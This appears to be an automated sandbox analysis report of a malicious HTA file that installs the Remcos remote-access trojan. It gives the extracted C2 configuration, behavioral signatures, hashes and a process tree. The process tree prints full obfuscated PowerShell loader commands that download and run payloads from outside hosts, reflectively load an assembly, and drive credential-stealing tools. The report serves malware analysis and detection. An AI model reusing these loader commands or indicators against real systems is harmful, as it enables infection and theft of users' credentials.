Analysis
-
max time kernel
148s -
max time network
146s -
platform
windows7_x64 -
resource
win7-20240729-en -
resource tags
arch:x64arch:x86image:win7-20240729-enlocale:en-usos:windows7-x64system -
submitted
20-01-2025 10:15
Static task
static1
Behavioral task
behavioral1
Sample
nicegirlkissedmewithloverissingmegoodgreatthings.hta
Resource
win7-20240729-en
Behavioral task
behavioral2
Sample
nicegirlkissedmewithloverissingmegoodgreatthings.hta
Resource
win10v2004-20241007-en
General
-
Target
nicegirlkissedmewithloverissingmegoodgreatthings.hta
-
Size
491KB
-
MD5
4b953e9801ac2ec60bf284162ed6793d
-
SHA1
090650754ac26c80128fed9b425000f3167551f4
-
SHA256
c76b7544fd10321bd84cd67c6662b7ceb4fe71a87789a09948c6ba690f0fb3ec
-
SHA512
f5d19a017a961229db0c10e06fe1da6a78693490d2928a6931ad5945ea93fa6b7bc193ae4c89f527702003293a05e7aba4618bba1c24508ef36015609ab4aa5a
-
SSDEEP
768:PnQVWUUGY6qZFKN9xv7RmzmBLStxuzHtu1Dj0YNYlBdNpdCb8sOUw8Qp3/GHxwv2:JRkKyMIBK2r0a8i4h
Malware Config
Extracted
remcos
zynova
millionairedreams2025.duckdns.org:14645
-
audio_folder
MicRecords
-
audio_path
ApplicationPath
-
audio_record_time
5
-
connect_delay
0
-
connect_interval
1
-
copy_file
remcos.exe
-
copy_folder
Remcos
-
delete_file
false
-
hide_file
false
-
hide_keylog_file
false
-
install_flag
false
-
keylog_crypt
false
-
keylog_file
logs.dat
-
keylog_flag
false
-
keylog_folder
remcos
-
mouse_option
false
-
mutex
Rmc-MGAETQ
-
screenshot_crypt
false
-
screenshot_flag
false
-
screenshot_folder
Screenshots
-
screenshot_path
%AppData%
-
screenshot_time
10
-
take_screenshot_option
false
-
take_screenshot_time
5
Signatures
-
Remcos family
-
Detected Nirsoft tools 3 IoCs
Free utilities often used by attackers which can steal passwords, product keys, etc.
resource yara_rule behavioral1/memory/288-63-0x0000000000400000-0x0000000000462000-memory.dmp Nirsoft behavioral1/memory/1952-55-0x0000000000400000-0x0000000000478000-memory.dmp Nirsoft behavioral1/memory/828-62-0x0000000000400000-0x0000000000424000-memory.dmp Nirsoft -
NirSoft MailPassView 1 IoCs
Password recovery tool for various email clients
resource yara_rule behavioral1/memory/288-63-0x0000000000400000-0x0000000000462000-memory.dmp MailPassView -
NirSoft WebBrowserPassView 1 IoCs
Password recovery tool for various web browsers
resource yara_rule behavioral1/memory/1952-55-0x0000000000400000-0x0000000000478000-memory.dmp WebBrowserPassView -
Blocklisted process makes network request 3 IoCs
flow pid Process 3 2704 powershell.exe 6 2920 powershell.exe 7 2920 powershell.exe -
Evasion via Device Credential Deployment 1 IoCs
pid Process 2704 powershell.exe -
Accesses Microsoft Outlook accounts 1 TTPs 1 IoCs
description ioc Process Key opened \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Office\Outlook\OMI Account Manager\Accounts CasPol.exe -
pid Process 2920 powershell.exe -
Suspicious use of SetThreadContext 4 IoCs
description pid Process procid_target PID 2920 set thread context of 1304 2920 powershell.exe 40 PID 1304 set thread context of 1952 1304 CasPol.exe 42 PID 1304 set thread context of 288 1304 CasPol.exe 43 PID 1304 set thread context of 828 1304 CasPol.exe 44 -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 11 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cvtres.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language CasPol.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language csc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WScript.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-2703099537-420551529-3771253338-1000\Software\Microsoft\Internet Explorer\Main mshta.exe -
Suspicious behavior: EnumeratesProcesses 6 IoCs
pid Process 2704 powershell.exe 2704 powershell.exe 2704 powershell.exe 2920 powershell.exe 1952 CasPol.exe 1952 CasPol.exe -
Suspicious behavior: MapViewOfSection 3 IoCs
pid Process 1304 CasPol.exe 1304 CasPol.exe 1304 CasPol.exe -
Suspicious use of AdjustPrivilegeToken 3 IoCs
description pid Process Token: SeDebugPrivilege 2704 powershell.exe Token: SeDebugPrivilege 2920 powershell.exe Token: SeDebugPrivilege 828 CasPol.exe -
Suspicious use of WriteProcessMemory 50 IoCs
description pid Process procid_target PID 2096 wrote to memory of 2740 2096 mshta.exe 31 PID 2096 wrote to memory of 2740 2096 mshta.exe 31 PID 2096 wrote to memory of 2740 2096 mshta.exe 31 PID 2096 wrote to memory of 2740 2096 mshta.exe 31 PID 2740 wrote to memory of 2704 2740 cmd.exe 33 PID 2740 wrote to memory of 2704 2740 cmd.exe 33 PID 2740 wrote to memory of 2704 2740 cmd.exe 33 PID 2740 wrote to memory of 2704 2740 cmd.exe 33 PID 2704 wrote to memory of 3016 2704 powershell.exe 34 PID 2704 wrote to memory of 3016 2704 powershell.exe 34 PID 2704 wrote to memory of 3016 2704 powershell.exe 34 PID 2704 wrote to memory of 3016 2704 powershell.exe 34 PID 3016 wrote to memory of 2716 3016 csc.exe 35 PID 3016 wrote to memory of 2716 3016 csc.exe 35 PID 3016 wrote to memory of 2716 3016 csc.exe 35 PID 3016 wrote to memory of 2716 3016 csc.exe 35 PID 2704 wrote to memory of 1132 2704 powershell.exe 37 PID 2704 wrote to memory of 1132 2704 powershell.exe 37 PID 2704 wrote to memory of 1132 2704 powershell.exe 37 PID 2704 wrote to memory of 1132 2704 powershell.exe 37 PID 1132 wrote to memory of 2920 1132 WScript.exe 38 PID 1132 wrote to memory of 2920 1132 WScript.exe 38 PID 1132 wrote to memory of 2920 1132 WScript.exe 38 PID 1132 wrote to memory of 2920 1132 WScript.exe 38 PID 2920 wrote to memory of 1304 2920 powershell.exe 40 PID 2920 wrote to memory of 1304 2920 powershell.exe 40 PID 2920 wrote to memory of 1304 2920 powershell.exe 40 PID 2920 wrote to memory of 1304 2920 powershell.exe 40 PID 2920 wrote to memory of 1304 2920 powershell.exe 40 PID 2920 wrote to memory of 1304 2920 powershell.exe 40 PID 2920 wrote to memory of 1304 2920 powershell.exe 40 PID 2920 wrote to memory of 1304 2920 powershell.exe 40 PID 2920 wrote to memory of 1304 2920 powershell.exe 40 PID 2920 wrote to memory of 1304 2920 powershell.exe 40 PID 2920 wrote to memory of 1304 2920 powershell.exe 40 PID 1304 wrote to memory of 1952 1304 CasPol.exe 42 PID 1304 wrote to memory of 1952 1304 CasPol.exe 42 PID 1304 wrote to memory of 1952 1304 CasPol.exe 42 PID 1304 wrote to memory of 1952 1304 CasPol.exe 42 PID 1304 wrote to memory of 1952 1304 CasPol.exe 42 PID 1304 wrote to memory of 288 1304 CasPol.exe 43 PID 1304 wrote to memory of 288 1304 CasPol.exe 43 PID 1304 wrote to memory of 288 1304 CasPol.exe 43 PID 1304 wrote to memory of 288 1304 CasPol.exe 43 PID 1304 wrote to memory of 288 1304 CasPol.exe 43 PID 1304 wrote to memory of 828 1304 CasPol.exe 44 PID 1304 wrote to memory of 828 1304 CasPol.exe 44 PID 1304 wrote to memory of 828 1304 CasPol.exe 44 PID 1304 wrote to memory of 828 1304 CasPol.exe 44 PID 1304 wrote to memory of 828 1304 CasPol.exe 44
Processes
-
C:\Windows\SysWOW64\mshta.exeC:\Windows\SysWOW64\mshta.exe "C:\Users\Admin\AppData\Local\Temp\nicegirlkissedmewithloverissingmegoodgreatthings.hta"1⤵
- System Location Discovery: System Language Discovery
- Modifies Internet Explorer settings
- Suspicious use of WriteProcessMemory
PID:2096 -
C:\Windows\SysWOW64\cmd.exe"C:\Windows\system32\cmd.exe" "/C pOWErSheLL -eX bYPass -NOp -W 1 -c deVIceCreDeNTialDePlOyMent.eXe ; INVoke-eXPreSsIOn($(INVoke-EXprEsSIoN('[SySTeM.tEXT.eNCOdinG]'+[CHaR]58+[ChaR]58+'uTf8.GEtStRinG([SySTEM.conVErt]'+[CHar]58+[chAr]0x3a+'fROmbaSE64StRINg('+[chAr]34+'JGdqUnh0USAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1CZXJkZUZJbklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlscWVNcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUlpLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5bm8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbFUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRWSmJXenhxdmwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlB0dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIWnpOcERwU0VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRnalJ4dFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS43L3hhbXBwL2trYi9uaWNlZ2lybHdhbnRtZXRva2lzc2hlcmxpcHN3ZWxsd2l0aG15bGlwcy50SUYiLCIkZW5WOkFQUERBVEFcbmljZWdpcmx3YW50bWV0b2tpc3NoZXJsaXBzd2VsbHdpdGhteWxpcC52YlMiLDAsMCk7U3RBUlQtU2xlZXAoMyk7U1RhcnQtcHJPQ2VTcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pY2VnaXJsd2FudG1ldG9raXNzaGVybGlwc3dlbGx3aXRobXlsaXAudmJTIg=='+[ChAr]0x22+'))')))"2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:2740 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exepOWErSheLL -eX bYPass -NOp -W 1 -c deVIceCreDeNTialDePlOyMent.eXe ; INVoke-eXPreSsIOn($(INVoke-EXprEsSIoN('[SySTeM.tEXT.eNCOdinG]'+[CHaR]58+[ChaR]58+'uTf8.GEtStRinG([SySTEM.conVErt]'+[CHar]58+[chAr]0x3a+'fROmbaSE64StRINg('+[chAr]34+'JGdqUnh0USAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICA9ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGFERC10WVBlICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1NZW1CZXJkZUZJbklUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICdbRGxsSW1wb3J0KCJ1ckxtT04iLCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIGlscWVNcSxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgWUlpLHN0cmluZyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICB5bm8sdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBJbFUsSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIHRWSmJXenhxdmwpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLW5BTWUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIlB0dyIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLU5hTWVzUGFDZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBIWnpOcERwU0VsZCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtUGFzc1RocnU7ICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICRnalJ4dFE6OlVSTERvd25sb2FkVG9GaWxlKDAsImh0dHA6Ly8xOTIuMjEwLjIxNS43L3hhbXBwL2trYi9uaWNlZ2lybHdhbnRtZXRva2lzc2hlcmxpcHN3ZWxsd2l0aG15bGlwcy50SUYiLCIkZW5WOkFQUERBVEFcbmljZWdpcmx3YW50bWV0b2tpc3NoZXJsaXBzd2VsbHdpdGhteWxpcC52YlMiLDAsMCk7U3RBUlQtU2xlZXAoMyk7U1RhcnQtcHJPQ2VTcyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAiJGVudjpBUFBEQVRBXG5pY2VnaXJsd2FudG1ldG9raXNzaGVybGlwc3dlbGx3aXRobXlsaXAudmJTIg=='+[ChAr]0x22+'))')))"3⤵
- Blocklisted process makes network request
- Evasion via Device Credential Deployment
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2704 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe"C:\Windows\Microsoft.NET\Framework\v2.0.50727\csc.exe" /noconfig /fullpaths @"C:\Users\Admin\AppData\Local\Temp\gkvskyfr.cmdline"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:3016 -
C:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exeC:\Windows\Microsoft.NET\Framework\v2.0.50727\cvtres.exe /NOLOGO /READONLY /MACHINE:IX86 "/OUT:C:\Users\Admin\AppData\Local\Temp\RESF0C6.tmp" "c:\Users\Admin\AppData\Local\Temp\CSCF0C5.tmp"5⤵
- System Location Discovery: System Language Discovery
PID:2716
-
-
-
C:\Windows\SysWOW64\WScript.exe"C:\Windows\System32\WScript.exe" "C:\Users\Admin\AppData\Roaming\nicegirlwantmetokissherlipswellwithmylip.vbS"4⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1132 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -NoProfile -Command "[System.Text.Encoding]::Unicode.GetString([Convert]::FromBase64String('JABpAG0AYQBnAGUAVQByAGwAIAA9ACAAJwBoAHQAdABwAHMAOgAvAC8AdQBwAGwAbwBhAGQAZABlAGkAbQBhAGcAZQBuAHMALgBjAG8AbQAuAGIAcgAvAGkAbQBhAGcAZQBzAC8AMAAwADQALwA4ADgAMwAvADQAMgAzAC8AbwByAGkAZwBpAG4AYQBsAC8AbgBlAHcAXwBpAG0AYQBnAGUALgBqAHAAZwA/ADEANwAzADcAMQAyADQAOQA4ADAAJwA7ACAAdAByAHkAIAB7ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAgAD0AIABOAGUAdwAtAE8AYgBqAGUAYwB0ACAAUwB5AHMAdABlAG0ALgBOAGUAdAAuAFcAZQBiAEMAbABpAGUAbgB0ADsAIAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAIAA9ACAAJAB3AGUAYgBDAGwAaQBlAG4AdAAuAEQAbwB3AG4AbABvAGEAZABEAGEAdABhACgAJABpAG0AYQBnAGUAVQByAGwAKQA7ACAAJABpAG0AYQBnAGUAVABlAHgAdAAgAD0AIABbAFMAeQBzAHQAZQBtAC4AVABlAHgAdAAuAEUAbgBjAG8AZABpAG4AZwBdADoAOgBVAFQARgA4AC4ARwBlAHQAUwB0AHIAaQBuAGcAKAAkAGkAbQBhAGcAZQBCAHkAdABlAHMAKQA7ACAAJABzAHQAYQByAHQARgBsAGEAZwAgAD0AIAAnADwAPABCAEEAUwBFADYANABfAFMAVABBAFIAVAA+AD4AJwA7ACAAJABlAG4AZABGAGwAYQBnACAAPQAgACcAPAA8AEIAQQBTAEUANgA0AF8ARQBOAEQAPgA+ACcAOwAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgAD0AIAAkAGkAbQBhAGcAZQBUAGUAeAB0AC4ASQBuAGQAZQB4AE8AZgAoACQAcwB0AGEAcgB0AEYAbABhAGcAKQA7ACAAJABlAG4AZABJAG4AZABlAHgAIAA9ACAAJABpAG0AYQBnAGUAVABlAHgAdAAuAEkAbgBkAGUAeABPAGYAKAAkAGUAbgBkAEYAbABhAGcAKQA7ACAAaQBmACAAKAAkAHMAdABhAHIAdABJAG4AZABlAHgAIAAtAGcAZQAgADAAIAAtAGEAbgBkACAAJABlAG4AZABJAG4AZABlAHgAIAAtAGcAdAAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAApACAAewAgACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAgACsAPQAgACQAcwB0AGEAcgB0AEYAbABhAGcALgBMAGUAbgBnAHQAaAA7ACAAJABiAGEAcwBlADYANABDAG8AbQBtAGEAbgBkACAAPQAgACQAaQBtAGEAZwBlAFQAZQB4AHQALgBTAHUAYgBzAHQAcgBpAG4AZwAoACQAcwB0AGEAcgB0AEkAbgBkAGUAeAAsACAAJABlAG4AZABJAG4AZABlAHgAIAAtACAAJABzAHQAYQByAHQASQBuAGQAZQB4ACkAOwAgACQAYwBvAG0AbQBhAG4AZABCAHkAdABlAHMAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEMAbwBuAHYAZQByAHQAXQA6ADoARgByAG8AbQBCAGEAcwBlADYANABTAHQAcgBpAG4AZwAoACQAYgBhAHMAZQA2ADQAQwBvAG0AbQBhAG4AZAApADsAIAAkAGwAbwBhAGQAZQBkAEEAcwBzAGUAbQBiAGwAeQAgAD0AIABbAFMAeQBzAHQAZQBtAC4AUgBlAGYAbABlAGMAdABpAG8AbgAuAEEAcwBzAGUAbQBiAGwAeQBdADoAOgBMAG8AYQBkACgAJABjAG8AbQBtAGEAbgBkAEIAeQB0AGUAcwApADsAJABtAGUAdABoAG8AZAAgAD0AIABbAFIAdQBtAHAALgBDAGwAYQBzAHMAOQBdAC4ARwBlAHQATQBlAHQAaABvAGQAKAAnAHMAbQBlAHQAaABvAGQAXwAyACcAKQA7ACAAJABtAGUAdABoAG8AZAAuAEkAbgB2AG8AawBlACgAJABuAHUAbABsACwAIABbAG8AYgBqAGUAYwB0AFsAXQBdAEAAKAAnAHQAeAB0AC4AcwBnAG4AaQBoAHQAeQByAGUAdgBlAHIAbwBmAGwAawB1AGYAaQB0AHUAYQBlAGIAeQByAGUAdgBlAHIAYQBzAGwAcgBpAGcAdABoAGcAaQBuAC8AYgBrAGsALwBwAHAAbQBhAHgALwA3AC4ANQAxADIALgAwADEAMgAuADIAOQAxAC8ALwA6AHAAdAB0AGgAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBmAGEAbABzAGUAJwAsACcAZgBhAGwAcwBlACcALAAnAGYAYQBsAHMAZQAnACwAJwBDAGEAcwBQAG8AbAAnACwAJwBmAGEAbABzAGUAJwApACkAOwAgAH0AIAB9ACAAYwBhAHQAYwBoACAAewAgAFcAcgBpAHQAZQAtAE8AdQB0AHAAdQB0ACAAJwBFAHIAcgBvADoAIAAkAF8AJwA7ACAAfQA=')) | Invoke-Expression"5⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of WriteProcessMemory
PID:2920 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe"6⤵
- Suspicious use of SetThreadContext
- System Location Discovery: System Language Discovery
- Suspicious behavior: MapViewOfSection
- Suspicious use of WriteProcessMemory
PID:1304 -
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\xsdurkhtmpipnuybxcz"7⤵
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
PID:1952
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\zmjnjcsuixaupavfgnllpzc"7⤵
- Accesses Microsoft Outlook accounts
- System Location Discovery: System Language Discovery
PID:288
-
-
C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exeC:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe /stext "C:\Users\Admin\AppData\Local\Temp\koofkudowfszagjjpxgnsexrow"7⤵
- System Location Discovery: System Language Discovery
- Suspicious use of AdjustPrivilegeToken
PID:828
-
-
-
-
-
-
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
1KB
MD5d3182fd744fd971a6c177cafc66cd3f6
SHA1cd526fd8d0934d3d87e8abb8a3ed7270b879ab26
SHA256192bec82dd3a41c8741e60b5ef372d299caf9cbe5b9fa6b9b06500c0c51cba43
SHA512bff6ae398d4ffff3cbb59ca364b50d033f2647952e0a75fa94adf5cc3b39d5acefb5027375f68d2152e5263bed5bb7804967305a426760936a3af43c1466bf1d
-
Filesize
3KB
MD5c93eeeeb9161ba72654ea27562e334af
SHA173ecb604d60397dcdf06ed73ff9a5167c66e4a72
SHA256f8e3bb55e9e3a7d96a99009d0f9c4f315fcd6c944124cfbb69d43797718c3a13
SHA51294781126b44395be010452503e1e95134bb68d1a7bbb37e1ba470e6fcca797ba28d0269935a28beba23a06eed64912b50e15542399bb045c716da4b58722ad8e
-
Filesize
7KB
MD5f69aa2b07412dfbfc819134e659bffc5
SHA194a6507eef8bba2bc897c81d1372c6246079c2eb
SHA25609bbc4a69d02a6185cb2496869e662640c02ad0b811b1203478f86acfc3b737d
SHA5129de38200c0d0dcf862cdd1a8de7226352bff1a118d796fa530c768c160b406d1623cf81b0ce99ffdfb15ba755cf1ae680664d600ee6e1f9535b90aafb3a8094f
-
Filesize
2B
MD5f3b25701fe362ec84616a93a45ce9998
SHA1d62636d8caec13f04e28442a0a6fa1afeb024bbb
SHA256b3d510ef04275ca8e698e5b3cbb0ece3949ef9252f0cdc839e9ee347409a2209
SHA51298c5f56f3de340690c139e58eb7dac111979f0d4dffe9c4b24ff849510f4b6ffa9fd608c0a3de9ac3c9fd2190f0efaf715309061490f9755a9bfdf1c54ca0d84
-
C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Recent\CustomDestinations\d93f411851d7c929.customDestinations-ms
Filesize7KB
MD548c64f15a12ee829afa7d5dad67e429f
SHA13b1a619cd853d9c5bf16b1005d23ce39604a0999
SHA25638abe4e1a3085dc82819b637edb8e70440e7afd8dd3a04c1d81034bf9de695ca
SHA512cecf3537166d70735c36a45ec50a6bdc8bf539fbce9f3be5be2ec66efee426266b0155df8b167645c1069025094f36ae8ddb050cfda49c20f41bc6ed91262bad
-
Filesize
213KB
MD5b14ef4fa92414ea1658977a049f15306
SHA111e59f935817673e2b68cfd36e4ce93d15034714
SHA256a6f979fe5ca109e929031fd0811506343b3089a13300438be24070650c6b6bf3
SHA5128b627fd09767ba773acdbcce52b646b1b819b261b72c17289d443a6c7e504f34b3402a64f73d48fef893d7d38dfbeef213ed5218c211558428307d69a03f9630
-
Filesize
652B
MD5edc19668225343ec3da80fe0e613f3ff
SHA1058190999ec3827d0216a5f466cf20efbabb02a8
SHA2561dbb4d7bbef2580ad6795f3c92cc39c9662fab63589ee525d809192f9661ab60
SHA51255fbf919ed2571cd04c55eabd7fb4d1ed8169eafbf66332b2e5fc3c8e872b5237a85c844bee1b00a707619b02afed888a567a3b193b42135a9900315d147fe1a
-
Filesize
478B
MD5680c55127532e413a19eddb51b0cb473
SHA17d279e255bc675f1c09df8b210ee4472b5d3b8b6
SHA256fdd40f201088921031cf300fdce7ca0be6e458b70d0f5df699cf6a0cc33a7515
SHA51227a542c554c27adf777c741eb218b7a0634392abced081722b43c51066dfb49d604473a9df4b4e257879355cb966882431286f7bbb2ed5d8a23840d837127205
-
Filesize
309B
MD5d43ae0d5ef10f74a696829ebfea4d7c6
SHA1cadb45cac43d8f92cbfd3b066baadb11a6a0a7b3
SHA2562121c66c63da9346f6d2bfa27f9224d23a3cb47b6df2feb649bb485ca7d5b0e9
SHA512285e5e7f35a7114b69755f7c749980e7fd6991aeb2a392fef2b785d90bb0c12f65dc4940b7de222fbcf41c4308127a7c8d29e40da9e109afa3986f462e91b175